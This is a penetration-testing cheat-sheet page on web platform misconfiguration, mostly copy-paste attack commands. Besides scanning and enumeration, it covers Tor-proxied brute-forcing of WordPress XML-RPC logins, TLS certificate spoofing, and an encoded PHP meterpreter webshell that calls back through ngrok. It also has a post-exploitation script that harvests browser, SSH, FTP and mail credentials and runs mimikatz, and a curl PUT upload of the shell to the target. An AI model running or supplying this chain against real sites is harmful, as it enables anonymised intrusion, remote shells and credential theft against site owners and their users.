Penetration Testing
  • Web
    • Reconnaissance
      • Search Engine Discovery
      • Fingerprint Web Server
      • Review Webserver Metafiles
      • Enumerate Applications
      • Review Webpage Content
      • Identify Application Entry Points
      • Map Execution Paths
      • Fingerprint Web Application Framework
      • Map Application Architecture
    • Open Source Intelligence
      • Infrastructure
      • People Investigation
    • Misconfiguration
      • Network Configuration
      • App Platform Configuration
      • File Extensions Handling
      • Review Old Backup
      • Enumerate Admin Interfaces
      • HTTP Methods
      • HTTP Strict Transport Security
      • RIA Cross Domain Policy
      • File Permission
      • Subdomain Takeover
      • Cloud Storage
      • Content Security Policy
      • Path Confusion
    • Identity Management
      • Role Definitions
      • User Registration
      • Account Provisioning
      • Account Enumeration
      • Weak Username Policy
    • Broken Authentication
      • Credentials Encrypted Channel
      • Default Credentials
      • Weak Lock Out Mechanism
      • Bypassing Authentication Schema
      • Vulnerable Remember Password
      • Browser Cache Weaknesses
      • Weak Password Policy
      • Weak Security Question Answer
      • Weak Password Reset Functionalities
      • Weaker Authentication in Alternative Channel
      • Multi-Factor Authentication
    • Broken Authorization
      • Directory Traversal File Include
      • Bypassing Authorization Schema
      • Privilege Escalation
      • Insecure Direct Object References
      • OAuth Weaknesses
    • Session Management
      • Session Management Schema
      • Cookies Attributes
      • Session Fixation
      • Exposed Session Variables
      • Cross Site Request Forgery
      • Logout Functionality
      • Session Timeout
      • Session Puzzling
      • Session Hijacking
      • JSON Web Tokens
    • Input Validation
      • Reflected Cross Site Scripting
      • Stored Cross Site Scripting
      • HTTP Verb Tampering
      • HTTP Parameter Pollution
      • SQL Injection
      • LDAP Injection
      • XML Injection
      • SSI Injection
      • XPath Injection
      • IMAP SMTP Injection
      • Code Injection
      • Command Injection
      • Insecure Deserialization
      • Format String Injection
      • Incubated Vulnerability
      • HTTP Splitting Smuggling
      • HTTP Incoming Requests
      • Host Header Injection
      • Server Side Template Injection
      • Server Side Request Forgery
      • Mass Assignment
      • Regular Expression DoS
      • PHP Type Juggling
    • Error Handling
      • Improper Error Handling
      • Stack Traces
    • Weak Cryptography
      • Weak Transport Layer Security
      • Padding Oracle Attack
      • Information Unencrypted Channel
      • Weak Encryption
    • Business Logic
      • Logic Data Validation
      • Ability to Forge Requests
      • Integrity Checks
      • Process Timing
      • Race Conditions
      • Circumvention of Work Flows
      • Defenses Against Application Misuse
      • Upload of Unexpected File Types
      • Upload of Malicious Files
      • Payment Functionality
    • Client Side
      • DOM-Based Cross Site Scripting
      • JavaScript Execution
      • HTML Injection
      • Client Side URL Redirect
      • CSS Injection
      • Client Side Resource Manipulation
      • Cross Origin Resource Sharing
      • Client Side Template Injection
      • Cross Site Flashing
      • Clickjacking
      • WebSockets
      • Web Messaging
      • Browser Storage
      • Cross Site Script Inclusion
      • Reverse Tabnabbing
    • API Attacks
      • Broken Object Level Authorization
      • Broken Authentication
      • Excessive Data Exposure
      • Lack of Resources and Rate Limiting
      • Broken Function Level Authorization
      • Mass Assignment
      • Security Misconfiguration
      • Injection Attack
      • Improper Assets Management
      • Insufficient Logging and Monitoring
  • Mobile
    • Mobile App Taxonomy
    • Mobile App Security Testing
    • General
    • Android
    • iOS
  • Cloud
    • Reconnaissance
    • SaaS
    • IaaS
    • Azure
    • AWS
    • GCP
    • IBM
    • Digital Ocean
    • Kubernetes
    • CI/CD
    • Active Directory
  • Network
    • Introduction
    • Intelligence Gathering
    • Vulnerability Analysis
    • Logical Vulnerabilities
    • Exploitation of Remote Services (User-Mode)
    • Exploitation of Remote Services (Kernel-Mode)
  • Wireless
    • Page 4
  • iot
    • Page 5
Powered by GitBook
On this page
  • Check List
  • Cheat Sheet
  • Sample and Known Files and Directories
  • Comment Review
  • System Configuration
  • Configuration Review
  • Logging

Was this helpful?

  1. Web
  2. Misconfiguration

App Platform Configuration

PreviousNetwork ConfigurationNextFile Extensions Handling

Last updated 2 months ago

Was this helpful?

Check List

Cheat Sheet

Sample and Known Files and Directories

20 Tor Tunnel

multitor --init 20 \
         --user debian-tor \
         --socks-port 9000 \
         --control-port 9900 \
         --proxy privoxy

Scan Web Server

nikto -h $WEBSITE

Subdomain Fuzzing

subfinder -d $WEBSITE -o /tmp/subdomains.txt

Resolve Subdomains

echo "1.1.1.1" > /tmp/resolvers.txt
shuffledns -d $WEBSITE \
           -l /tmp/subdomains.txt \
           -r /tmp/resolvers.txt \
           -mode resolve \
           -o /tmp/alive-subdomains.txt

Check Http Live

cat /tmp/sub-domains.txt | \
httpx -silent -sc -probe -title -td -ip \
      -mc 200,404,403,302,301,303,304,305,306,307,302 \
      -o /tmp/sub-domains.txt

Find Alive Ports

httpx-toolkit -l /tmp/alive-subdomains.txt \
              -ports 80,443,8080,8000,8888,8082,8083 \
              -o /tmp/alive-sub-and-ports.txt

Find Source URLs

katana -u /tmp/alive-subdomains.txt \
       -d 5 -ps \
       -pss waybackarchive,commoncrawl,alienvault \
       -kf -jc -fx \
       -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg \
       -o /tmp/all-urls.txt

Find Sensitive Infos

cat /tmp/all-urls.txt | \
grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5'

Directory Fuzzing

dirsearch -l /tmp/sub-domains.txt \
          -t 150 -x 403,404,500,429 -i 200,301,302 
          --random-agent

List all Tags

nuclei -tgl

Scan OSINT & Recon

nuclei -u $WEBSITE -tags osint enum recon

Scan CVEs & Vulnerabilities

nuclei -u $WEBSITE -tags cves detect vulnerabilities

Scan CVEs with Multitor

nuclei -u $WEBSITE -tags cves detect vulnerabilities -proxy socks4://127.0.0.1:16379

Scan Misconf & Panel

nuclei -u $WEBSITE -tags exposure misconfig disclosure tech panel

XSS & SQLi & LFI & RCE & SSRF

nuclei -u $WEBSITE -tags xss lfi sqli ssrf traversal fileupload rce unauth deserialization

Scan General

wpscan --url $WEBSITE --rua --api-token $TOKEN

Scan with Multitor

wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379

Enum Users

wpscan --url $WEBSITE --rua --api-token $TOKEN -e u, m

Enum Plugins

wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap, vp, p

Enum Themes

wpscan --url $WEBSITE --rua --api-token $TOKEN -e at, vt, t

Enum Config Backups

wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb, dbe, tt

Scan General

joomscan -u $WEBSITE --random-agent

Scan with Multitor

joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379

Enum Endpoints

joomscan -u $WEBSITE --random-agent -ec

Scan General

droopescan scan drupal -u $WEBSITE

Enum Endpoints

droopescan scan drupal -u $WEBSITE --enumerate a

Scan General

drupwn --mode exploit --target $WEBSITE

Enum Endpoints

drupwn --mode enum --modules --target $WEBSITE

Enum Users

drupwn --mode enum --users --target $WEBSITE

Scan SharePoint

spartan -u $WEBSITE --sps --users -s

Scan & Enum IIS

iis_shortname_scanner 2 20 $WEBSITE

Comment Review

HTML Sources

katana -u $WEBSITE

JS Sources

katana -u $WEBSITE | grep "\.js$"

CSS Sources

katana -u $WEBSITE | grep "\.css*"

System Configuration

lynis
hardentools-cli.exe

Configuration Review

HTTP Methods

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

PingBack XMLRPC

msfconsole -qx "
    use auxiliary/scanner/http/wordpress_pingback_access;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    run;
    exit"

Brute force XMLRPC with Multitor

msfconsole -qx "
    use scanner/http/wordpress_xmlrpc_login;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set USERNAME admin;
    set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;
    set THREADS 10;
    set STOP_ON_SUCCESS true;
    set Proxies socks4:127.0.0.1:16379;
    run;
    exit"

Scan PUT Methods

msfconsole -qx "
    use auxiliary/scanner/http/http_put;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set PATH /wp-content/uploads;
    run -j"

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

Generate Webshell

msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         HandlerSSLCert=$CERT \
         StagerVerifySSLCert=true \
         PayloadUUIDTracking=true \
         PayloadUUIDName=StagedPHP \
         EnableStageEncoding=true \
         -f raw \
         -e php/base64 \
         -i 3 \
         -o /tmp/unk9vvn.php; \
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php; \
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Listening Metasploit

msfconsole -qx "
    use multi/handler;
    set PAYLOAD php/meterpreter/reverse_tcp;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Upload Shell PUT Method

curl -v $WEBSITE/wp-content/uploads --upload-file /tmp/unk9vvn.php

Logging

Commix

Code Injection

commix -u $WEBSITE

Multitor
Nikto
SubFinder
ShuffleDNS
Httpx
Httpx-Toolkit
Katana
Grep
Dirsearch
Nuclei
WPScan
Joomscan
Droopescan
Drupwn
SPartan
IIS-ShortName-Scanner
Katana
Lynis (Linux)
Hardentools (Windows)
Nmap
Metasploit